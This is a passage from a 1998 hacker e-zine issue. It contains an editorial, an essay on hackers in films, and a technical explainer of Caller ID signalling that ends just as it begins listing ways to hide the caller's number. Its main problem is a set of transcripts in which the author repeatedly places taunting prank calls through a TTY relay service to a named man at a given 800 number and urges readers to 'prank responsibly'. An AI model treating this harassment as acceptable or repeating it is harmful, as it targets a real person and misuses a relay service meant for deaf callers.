Copy Link
Add to Bookmark
Report
Digital Phreak P1mps Issue 09
........
.d########b:......disposable planet....
,F$############m... ...::d#########b.
.%@#####;``:#######$:::...:::##############n,
t#####V'`:.:`$#####::::..:::r#####'^``^\#####$
`;$###$::..::q####p:::....:::###:`'.:..:`:###$
Y###$::..::`$###::::....:::###:::':..:::###$
$###p:::..::$##{digital phreak p1mps}:.:###$
$##::::...::@###:::.....:::###$:::..:::&###$
$###b::...::$###:::.....:::###&:::..:::*###$
$###&::...::&###:::.....:::###$:::..:::*###:
$###$::...::$###:::.....:::###$:::..:::&###:
...hi mom...##@::...:!######:::..:::###:b;:::..::$###:
f####Q::...::q######::..::######::::..:$###.'
t####y::...:::o###############$:':::..::$###$
d!##!b::....:::'Q############%!`:::...:: $###:.
`#$$%' ````^^~~~^~^~' @$$!b.
`::; `````````` :$&::
;" Issue 9, Volume 1 `q
. 12.14.98 :
http://members.tripod.com/~p1mp .'
-
<hoal:#p1mp> hackers suck
-
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ Disclaimer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ "Congress shall make no law respecting an establishment of religion, or ³
³ prohibitting the free excercise thereof; or abbridging the freedom of ³
³ speech or of the press; or of the right of the people peaceably to ³
³ assemble, and to petition the Goverment for a redress of grievances" ³
³ ³
³ Under the above Law set forth in the First Amendment To The Constution ³
³ Of The United States Of America, The Author releases this work into the ³
³ pubic domain for INFORMATIONAL PURPOSES ONLY. ³
³ ³
³ Some of the things mentioned in this issue may be illegal/immoral/dumb. ³
³ So don't do anything or something. If you do something that you read ³
³ in this 'zine, and you get caught/hurt/maimed/killed/pissed off/raped, ³
³ it isn't our fault. We're not responsible for your stupidity. ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ Editorial Staff, Writers, and other d0rks ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ MEDEVIL TIMES!$^!: hatredonalog mr_log@gw.vulgar.net ³
³ stresss... ungh..: napalmoliv nampalmoliv@yahoo.com ³
³ Mai Ling: Sphinx sphinx@hotmail.com ³
³ Payphone Kung-Fu master: MMX_Killa MMX_Killa@geocities.com ³
³ DXM is cool!: Nothingg nothingg@yahoo.com ³
³ I was surfing the web Neptunium Quixilver@mailexcite.com ³
³ from a mother box!: Overkill ³
³ I still don't 0wn a puter: Enzyme papa_gorgio@hotmail.com ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ Contents ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ x. Editorial...................................................... hoal ³
³ 1. Opinion: Hacking in the Media vs Real Life................ RGBKnight ³
³ 2. Walter Levy II: TTY Land....................................... hoal ³
³ 3. CallerID: Up close and Personal................................ hoal ³
³ 4. Carding.......Unexplored Territory Vol. 2 of 2....Neptunium Overkill ³
³ 5. Back Orifice for Fun and Profit, part 1 of 5........... by MMX Killa ³
³ 6. Outro: Opossum................................................. hoal ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
x. Editorial:
[10.14.98]-
Hrm, well.. life sucks ass. All i have done for the last month and
a half was Sleep, go to school, and work. I have found less and less
time to do the things that I really enjoy doing (but more money to do
them with, when i get the time =). I have found myself with a few free
hours today after school.. y4y. So what am I doing? I am sitting on
my ass, at my computer staring at my monitor. /me sighs.
I *should* be outside doing something. Doesn't matter what, just
something. I could be practicing my hacky sack skills, skateboarding,
raking leaves, or canning. Hell, I could be trying to make my network,
well WORK. I have a rather large project due next tuesday (today is
thursday) and i am far from complete. What is my point with all of this?
I am lazy. And in one day i do more than most people i know... so
what does that say about my community? or even (/me shudders) our
nation? I get told this on a regular basis at school:
"Americans are lazy, arrogant, for the most part self centered and
are conceited, etc, etc..."
Hrm.. well now. If we don't like this, then why don't we do something
about it? BECAUSE WE'RE TOO GOOD FOR THAT, WE'RE BETTER THAN THOSE
PEOPLE. Ahh.. see the loop? Hrm.. I think that I've done enough
incoherent babbling for now.. oh well. Here is Issue 10, released
god know's when. =P
-
[10.29.98]-
Hrm.. adding more it seems. I am really stressed out... fucking work
school and other shit have all been gnawing at me. Im not getting enough
hours at work, but my friend is willing to give me damn near all of his..
except I don't like doing what he's always scheduled to do. Hrm.. and
school, i don't like that either. This year (sophomore) I'm working for
good grades.. and yes I'm getting them. But at what price? No free time
between work and school. My thoughts.. I seem to not be taking time to
do things I like. Maybe I should go to some garage sales today, look for
computer junk to buy. hrm.. more ramblings. Ah fuck it.. scroll down to
read the rest. =)
-
-(a very tired)hoal
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ 1. Opinion: hacking in the media vs real life ³
³ by RGBKnight (rgbknight@usa.net) ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Hackers are a favorite topic of the media. The press loves to hound
apprehended computer felons, and they all get meaty book deals, long
newspaper articles, and great treatments on cable news web sites. We've
also seen countless hacker movies, running the gamut from "Hackers" and
"WarGames" down to "StarWars" and "Ferris Bueller's Day Off," both of
which did involve hacking in atleast one scene. (watch them again if you
didn't get it)
However, there are hackers everywhere in the media, even if they aren't
identified as such. Let's take a sweet and innocent show. Say, good ol'
Saturday morning Muppet Babies. Yeah, I actually watched that show many
years ago in the Dark Ages of CBS. Those of you who saw it will remember
that Scooter was a complete computer geek. When they were all imagining
what the future would belike, Scooter said that computers would control
the world and all be in one huge worldwide net. And this was the 1980s!
If the Muppet Show Scooter was anything like the Muppet Babies one, he'd
probably have a turquoise mohawk and an earring that attached to his DX
laptop. But I digress. So Scooter was one potential hacker, and we all
know that hackers startout as geeks with PCs. Hell, we all started out
that way. Not one real hacker does it just to be a freak. Some crackers
do that, but the actual hackers are all matured geeks.Now, let's look
at something else. How is hacking portrayed in the media? Remember Zero
Cool's Pirate Eye piece from Hackers, or their laptop GUIs? How 'bout
when R2D2 hacked the death star with a turning arm? Or when Ferris changed
his absentee record in real time with an XT? Fact is, none of us hack
anything like that. It just don't work thatway. The idea of hackers being
able to penetrate everything is correct, but the film notion that it's done
with a Macintosh PowerBook and a fancy GUI iscompletely incorrect.
[Editorial Note: You forgot Donatello from the Teenage Mutant Ninja
Turtles.. he was a fucking hax0r. ]
"Independence Day?" Jeff Goldblum played a damned believable hacker, but he
still used that staple PowerBook. "The Net?" PowerBook. The best hacker
laptop I've seen in a screen production was in that episode of The X-Files
written by William Gibson, where a solitary hacker who had made his own OS
was hacking off of a taped up black piece of shit in the cornerof a coffee
shop. He's uploading an AI, screens of hex are flying by, and windows are
popping up like mad as he sits on a coffee high. Mulder says that he could
have been Bill Gates.
That, kids, is hacking. These posers in the movies don't make real hackers.
It is the geeks that make the hackers. We call ourselves the "1337 H4x0rs"
but we're just geeks with a trade that we happen to be damned good at.
Tonight, I will work on my Linux skills as I attempt to get X11 working.I
won't be using a fancy GUI (I'll be fixing one :-P) and I won't be using a
PowerBook.
I'm not cinematic. I'm a computer geek. And that kicks ass.
--
signature{
D Joseph Jones, RGBKnight rgbknight@usa.net
ICQ: http://wwp.mirabilis.com/9722048 (UIN 9722048) IM RGBKnight
Visit Knightline RGB, the premiere information site for stalkers
wishing to find me and subject me to bizzare acts of cruelty:
http://bigsun.wbs.net/homepages/r/g/b/rgbknight/index.htm
I use Windows 98 and Netscape 4. And Linux. 'Ey, nobody poifect!
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ 2. Walter Levy II: TTY Land ³
³ by hoal (hatredonalog@gw.vulgar.net) ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
If you don't already know who Walter is, go back and read dpp02.txt...
the beginning of it all. He put a restriction on the call in area for
his 800 number and i cant call him anymore... or so he thought. I left
him alone for a few monthes because i had better things to do. Appearently,
in the mean time.. he went about having some kid arrested. This i don't
like. I telneted to my favorite dialout and proceeded to call him via TTY
repeatedly.. this is the result. Enjoy and prank responsibly.
atdt818006545984
CONNECT 2400
BUFFER 38400
ca 2497 (F) nbr calling pls ga 1800 369 1254 GA CthankOU you .. dialing ..
answered... (male) hold on a minute .. (holding) (male) hello GA
IS THIS THE FBI Q GA
sure if hyxx that is what you like q ga
OH REALY GA
THATS NICE GA
DID YOU HAVE FUN BUSTING THAT POOR KID Q GA
uhhh no .. umm ga
HRM, WELL... WHAT IS YOUR NAME Q
AGENT ... Q
ARE YOU AGENT THOMAS CACTUS Q GA
THIS IS MR_LOG OF THE DPP GA
what is the spelling on that last name q ga
YOURS OR MINE?
Q ga
yours .ga
LOG GA
AS IN HATREDONALOG GA
thank mr. log very much and i think this is the end of this call,
thank you ..
(hung up) ga or sk SK
[ That bastard fbi agent called me mr. log, not mr_log.. damn them.]
atdt818006545984
CONNECT 2400
BUFFER 38400
ca 0702 (m) nbr calling pls ga 1800 369 1254 GA
thank you .. dialing .. ringing 1...2, 3, 4, 5, 6, 7, hello ga
HI GA
hold on a moment..
CAN I TALK TO WALLY Q GA
this is wally ga HEY GA
IS THE FBI STILL THERE Q GA
[dissconnected... blah]
atdt818006545984
CONNECT 2400
BUFFER 38400
CA 5458 (M) nbr calling pls ga thank you .. dialing .. ringing 1... ans
wered... (male) hello? ok, umm why dont you tell the .. ok why don t you tell
the guy to call some other number ok? thank you.
(hung up) ga or sk GA
(hung up) ga or sk GA
redial q ga Y GA
thank you .. dialing .. (nbr busy) ga or sk GA
(nbr busy) ga or sk ga thank you .. dialing ..
(nbr busy) ga or sk ga thank you .. dialing ..
(nbr busy) ga or sk ga thank you .. dialing ..
(nbr busy) ga or sk ga thank you .. dialing .. b
(ca here may i have the number that you wish to dial please q ga )
YES GA
1800 369 1254 GA
thank you .. dialing .. ringing 1... (male) hello from
tell roy to please drop dead (hung up) ga or sk
DEAD Q
WAS THAT VERY NICE OF HIM Q GA
(ca do you wish to place another call q ga )
CAN YOU TELL ME IF YOU THOUGHT THAT WAS VERY NICE Q GA
(ca here may i have the number that you wish to dial q ga )
YES, AFTER YOU TELL ME WHETHER OR NOT YOU APPROVE OF HIS LANGUAGE. GA
(ca here im just a ca i am to stay neutral may i have the number that you wi
sh to dial q ga)
OH, OKAY, YES I WANT TO CALL HIM BACK
thank you .. dialing .. ringing 1...2... 3... 4... 5... 6... 7... 8... 9...
10... 11... 12... 13... (male) yes from roy q ga
HELL YEAH GA
YOU SUCK, WALLY GA
tell roy you are wasting resourses time and wasting all his energy thats all i
have to say thank you (hung up) ga or sk GA
(hung up) ga or sk GA
(ca here may i have the number that you wish for me to dial q ga )
800 369 1254
GA
thank you .. dialing .. ringing 1... speak (male) operator i hate to b
reak the news to you this guy is busting my chops and yours and im not gonna
take the call. than this is a prank call thank you
HAHAHAHAH0AH30HA30HA30A GA
(hung up) ga or sk
atdt818006545984
CONNECT 2400
BUFFER 38400
CA 5458 (M) nbr calling pls ga ga
thank you .. dialing .. ringing 1... (male) walter ... ( one moment pls)
HI GA
(male) .. from whome q ga
MR LOG OF THE DPP YO GA
yeah whats a dpp q ga
yeah whats a dpp q ga
DPP IS A HAX0R MAGAZINE GA
oh well were not interested in hacking ga
WHY NOT Q GA
because we have a business to do not games to play what does mr log want q ga
I WANT TO HAX0R YOU MR FED GA
YOU FEDX0R GA
PHED GA
does that constitute a death threat q ga NO GA
A HACK THREAT GA
ARE YOU A FEDERAL AGENT Q GA
ok if you have something to say then say it otherwise crawl back in your hole ga
MY HOAL Q GA
ARE THE FEDS THERE Q GA
they are always here ga
CAN I TALK TO THEM Q GA
PLEASE Q GA
you are .. you are talking to them ga
WERD GA
WHAT IS YOUR NAME, I DONT LIKE CALLING YOU 'FED' GA
what is yoiur name a real name and a address and phone number q ga
DO YOU THINK IM THAT DUMB Q GA
BLAH GA
well there is a one word answer for that and its .... yes !! yes !! ga
WHOA, YOUR A MEAN FED GA
ok umm game is over thank you very much and the hole i
meant is that hole in the ground where you sleep at night and this...(i cut it off) =(
[Damn, now these are not nice fedz at all (if however likely they are fedz at all)
and can you beleive they wanted me to just give him my info? heh.. this is funny. ]
Hrm.. I called him on a conf and asked him to NOT refer to me as roy
anymore.. i hope he stops. =)
-hoal
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÕÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸
³ 3. CallerID: Up close and Personal ³
³ by hoal (hatredonalog@hotmail.com) ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
CallerID: Upclose and Personal
by hatredonalog (hatredonalog@hotmail.com)
1 - Intro
1.1 What is CID?
1.2 Privacy Issues
1.3 Stuff Stolen from the alt.2600 faq
2 - How a message is sent (basically)
2.1 Basics
2.2 Figuring out the data & checksums
2.3 Differences between SDMF and MDMF
2.5 With CIDCW
3 - 0day Exploits
3.1 Defeating CID
3.2 Alternate CID info
4 - Apendix
4.a Glossary
4.b Resources
Introduction to CallerID
1.1 - What is CID?
CallerID is a low level knock off of ANI. It is a service from your LATA that
allows youto see who is calling you. It gives you the Month, Day, Time and the
number of the personcalling you (and optionally also the name). In this article
i hope to explain just how it works and maybe you'll learn something. On with it,
no?
1.2 - Privacy Issues
When dealing with CallerID, some Privacy issues arise. What if you don't want the
person your calling to get your inf0z? Well, when it first came out some privacy
activist groups had a hernea over it. Great, eh? Anyways, now RBOC's are SUPPOSED
to let you block CND info for free, but from what i've heard, they don't always let
you. This is where *67 originates from, and it simply tells the CO to not send your
info to the box.
1.3 - Stuff stolen from the alt.2600 faq
Modem Requirements
Although the data signalling interface parameters match those of a Bell 202 modem,
the receiving CPE need not be a Bell 202 modem. A V.23 1200 bps modem receiver may
be used to demodulate the Bell 202 signal. The ring indicate bit (RI) may be used
on a modem to indicate when to monitor the phone line for CND information. After
the RI bit sets, indicating the first ring burst, the host waits for the RI bit to
reset. The host then configures the modem to monitor the phone line for CND information.
Applications
Once CND information is received the user may process the information in a number
of ways. The date, time, and calling party's directory number can be displayed.
Using a look-up table, the calling party's directory number can be correlated with
his/her name and the number displayed.
CND information can also be used in additional ways such as for:
o Bulletin board applications
o Black-listing applications
o Keeping logs of system user calls
o Implementing a telemarketing data base
Technical information
2.1 - How CID information is sent (basiclly)
The method of transport was invented by Carolyn Doughty and was first used
by New Jersey Bell. Unlike What some people seem to think, The CID Info is
sent from the CO handing the call to the CPE (Customer Premise Equipment)
otherwise known as the box. Under SS7 the CPNM (Caller Party number message)
CANNOT be blocked from the receiving CO, but can be blocked from the called
party, when making a long distance call.
The CallerID info is sent between the first and second ring (pretty much common
knowledge) and is sent via Frequency Shift Keyed (FSK). The Data is sent at
1200bps and the CPE has a Bell 202 modem in it to receive the FSK. There are two
formats in which the CND (Caller Number Delivery) is sent. These are SDMF (Single
Data Message Format) and MDMF (Multipul Data Message Format), both of which i will
go into later. The main difference between the two is simply, that the name of the
calling party is also sent with MDMF.
The modulation is a continuous phased-binary FSK. The Logical 1 is 1200hz give or
take 12hz and the logic 0 is 2200hz for logical 0 give or take 22hz. These are the
two binary states 1 and 0. They are sent asynchronously at -13dBm and are tested at
the CO across at 900 ohm test termination. The data is sent after a minimum of 500ms
(miliseconds) when the Channel seizure is sent. The channel seizure is 250ms in
length and is 300bits of alternating 1's and 0's beginning with a 0 and ending with a
1. Immediately after the Channel Seizure is sent the Mark Signal is transmitted. It
consists of 180 bits, and is 150ms in length. They prepare the CPE to receive the CND
data. Then the Least Significant Bit (LSB) of the most significant character is sent.
This is under both SDMF and MDMF. Each charactor sent is 8 bits (1 octet) and for all
displayable data they represent ASCII codes, and each string of 8 bits is preceded by
a Start bit and proceded with a stop bit. This equals 10 bits per charactor. Finally,
all the information sent, is followed by a checksum. This is to make sure that the
data was sent and received properly.
Here is a Basic CND signal:
1st ring : (500ms) Channel Seizure : Mark Signal : CID Info : Checksum (200ms) : 2nd ring
2.2 - Figuring out the Data & checksums
ÚÄÄÄÄÄÄÄÄ¿
³Figure 1³
ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Character ³ Decimal ³ ASCII ³ Actual ³
³Description ³ Value ³ Value ³ Bits (LSB)³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³Message Type (SDMF) 4 0 0 0 0 0 1 0 0³
³Message Length (18) 18 0 0 0 1 0 0 1 0³
³Month (December) 49 1 0 0 1 1 0 0 0 1³
³ 50 2 0 0 1 1 0 0 1 0³
³Day (25) 50 2 0 0 1 1 0 0 1 0³
³ 53 5 0 0 1 1 0 1 0 1³
³Hour (3pm) 49 1 0 0 1 1 0 0 0 1³
³ 53 5 0 0 1 1 0 1 0 1³
³Minutes (30) 51 3 0 0 1 1 0 0 1 1³
³ 48 0 0 0 1 1 0 0 0 0³
³Number (6061234567) 54 6 0 0 1 1 0 1 1 0³
³ 48 0 0 0 1 1 0 0 0 0³
³ 54 6 0 0 1 1 0 1 1 0³
³ 49 1 0 0 1 1 0 0 0 1³
³ 50 2 0 0 1 1 0 0 1 0³
³ 51 3 0 0 1 1 0 0 1 1³
³ 52 4 0 0 1 1 0 1 0 0³
³ 53 5 0 0 1 1 0 1 0 1³
³ 54 6 0 0 1 1 0 1 1 0³
³ 55 7 0 0 1 1 0 1 1 1³
³Checksum 79 0 1 0 0 1 1 1 1³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
It is all simple conversion from binary to ASCII (and decimal). Here, we will
tear it down octet by octet.
The Message Type is Straight forward. It specifies one of two types, SDMF or
MDMF. If it is SDMF the binary sent is 00000100 (4 bits), and if the type is
MDMF, the binary sent is 10000000 (128 bits).
The Message Length is also quite easy to figure out. The binary converted to
decimal is the message length. 00010010 is 18, and 18 is the message length.
Done, easy.
The time is sent in military fashion. To get the normal time, put the two
time bits together and less 12. (ei: 1+5 == 15 - 12 == 3pm). Figuring out the
checksome is slightly more difficult, but not that much. Then you just add on
the next two values to create the minutes.
The numbers are figured out exactly like the Message length, so dont worry
about that.
The checksome word is the last data to be sent,and is a twos complement of
the 256 modolo sum of each bit in the other words of the message. When the
message is received by the CPE it checks for errors by taking the received
checksum word and adding the modulo 256 sum of all of the other words received
in the message.
Figuring out the checksum is not difficult. The first step is to add up the
values of all of the fields (not including the checksum). In this example the
total would be 945. This total is then divided by 256. The quotient is
discarded and the remainder (177) is the modulo 256 sum. The binary equivalent
of 177 is 10110001. To get the twos compliment start with the ones compliment
(01001110), which is obtained by inverting each bit, and add 1. The twos
compliment of a binary 10110001 is 01001111 (decimal 79). This is the checksum
that is sent at the end of the CID information. When the CPE receives the CID
message it also does a modulo 256 sum of the fields, however it does not do a
twos complement. If the twos complement of the modulo 256 sum (01001111) is
added to just the modulo 256 sum (10110001) the result will be zero.
2.3 - Differences between SDMF and MDMF
ÚÄÄÄÄÄÄÄÄ¿
³Figure 2³
ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Character ³ Decimal ³ ASCII ³ Actual ³
³Description ³ Value ³ Value ³ Bits (LSB) ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³Message Type (SDMF) 4 0 0 0 0 0 1 0 0³
³Message Length (9) 9 0 0 0 0 1 0 0 1³
³Month (December) 49 1 0 0 1 1 0 0 0 1³
³ 50 2 0 0 1 1 0 0 1 0³
³Day (25) 50 2 0 0 1 1 0 0 1 0³
³ 53 5 0 0 1 1 0 1 0 1³
³Hour (3pm) 49 1 0 0 1 1 0 0 0 1³
³ 53 5 0 0 1 1 0 1 0 1³
³Minutes (30) 51 3 0 0 1 1 0 0 1 1³
³ 48 0 0 0 1 1 0 0 0 0³
³Private 80 P 0 1 0 1 0 0 0 0³
³Checksum 16 0 0 0 1 0 0 0 0³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
That is how a "Private" Call would be displayed, if the Caller didn't
use *67, it would look like figure 1.
ÚÄÄÄÄÄÄÄÄ¿
³Figure 3³
ÃÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³Character ³ Decimal ³ ASCII ³ Actual ³
³Description ³ Value ³ Value ³ Bits (LSB)³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³Message Type (MDMF) 128 1 0 0 0 0 0 0 0³
³Message Length (33) 33 0 0 1 0 0 0 0 1³
³Parameter Type (Date/Time) 1 0 0 0 0 0 0 0 1³
³Parameter Length (8) 8 0 0 0 0 1 0 0 0³
³Month (November) 49 1 0 0 1 1 0 0 0 1³
³ 49 1 0 0 1 1 0 0 0 1³
³Day (28) 50 2 0 0 1 1 0 0 1 0³
³ 56 8 0 0 1 1 1 0 0 0³
³Hour (3pm) 49 1 0 0 1 1 0 0 0 1³
³ 53 5 0 0 1 1 0 1 0 1³
³Minutes (43) 52 4 0 0 1 1 0 1 0 0³
³ 51 3 0 0 1 1 0 0 1 1³
³Parameter Type (Number) 2 0 0 0 0 0 0 1 0³
³Parameter Length (10) 10 0 0 0 0 1 0 1 0³
³Number (6062241359) 54 6 0 0 1 1 0 1 1 0³
³ 48 0 0 0 1 1 0 0 0 0³
³ 54 6 0 0 1 1 0 1 1 0³
³ 50 2 0 0 1 1 0 0 1 0³
³ 50 2 0 0 1 1 0 0 1 0³
³ 52 4 0 0 1 1 0 1 0 0³
³ 49 1 0 0 1 1 0 0 0 1³
³ 51 3 0 0 1 1 0 0 1 1³
³ 53 5 0 0 1 1 0 1 0 1³
³ 57 9 0 0 1 1 1 0 0 1³
³Parameter Type (Name) 7 0 0 0 0 0 1 1 1³
³Parameter Length (9) 9 0 0 0 0 1 0 0 1³
³Name (Joe Smith) 74 J 0 1 0 0 1 0 1 0³
³ 111 o 0 1 1 0 1 1 1 1³
³ 101 e 0 1 1 0 0 1 0 1³
³ 32 0 0 1 0 0 0 0 0³
³ 83 S 0 1 0 1 0 0 1 1³
³ 109 m 0 1 1 0 1 1 0 1³
³ 105 i 0 1 1 0 1 0 0 1³
³ 116 t 0 1 1 1 0 1 0 0³
³ 104 h 0 1 1 0 1 0 0 0³
³Checksum 88 0 1 0 1 1 0 0 0³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
The only Differences between SDMF and MDMF is that MDMF is slightly more
advanced and has more features. It Displays the Calling party's name along
with the number. It also has the Message type and length paramaters. The
Message type is defined as either 00000100 (SDMF) or 10000000 (MDMF). With
SDMF the Minimum message length can be 9 octets, whereas with MDMF the
minimum length can be 13. When the minimum is sent, neither the CND or
the CNAM (Caller Name) is displayed. In they're place, either an "O" (out
of area) or a "P" (Private) is sent (as in the case of Figure 2).
2.4 - With CIDCW
CIDCW stands for CallerID on Call Waiting. It's so you know who is calling, even
when your already on the phone. It runs *only* under MDMF (which i think is
standard). It varies a bit from normal CID. It doesn't send any kind of Channel
Seizure and the Mark signal is only 80 bits. Instead of a Channel Seizure, it sends
a CAS (CPE Alert Signal) along with the SAS (Subscriber Alert Signal) and the box
responds with a ACK signal, during which time it mutes the handset. Then it receives
the FSK data, at which point it unmutes your phone after the data is received. Here
is the sequence:
SAS/CAS : CPE returns ACK : CO sends FSK : info displayed
handset muted --^ handset unmuted --^
Tone freqencies:
SAS == 440mhz (300ms in length
CAS == 2030+2750 (DTMF)
ACK == "A" or "D"; A == 941+1633hz
D == 697+1633Hz
Surprisingly enough (to me at least), the ACK response is either the "A" or "D"
tones from a Silver Box. So ha, they are still used for something other than
PBX's or ham radio.
0day Exploits
3.1 Defeating CID
Okay, I did steal this from the Fixer's Beating CallerID File. But, I really
couldn't say it any better, so i included it. But mad cred's to the fixer for
being so elite. =)
(1) Use *67. It will cause the called party's Caller ID unit to
display "Private" or "Blocked" or "Unavailable" depending on the
manufacturer. It is probably already available on your line, and if
it isn't, your local phone company will (most likely - please ask
them) set it up for free. This is the simplest method, it's 100
percent legal, and it works.
(2) Use a pay phone. Not very convenient, costs 25 or 35 cents
depending, but it cannot be traced back to your house in any way,
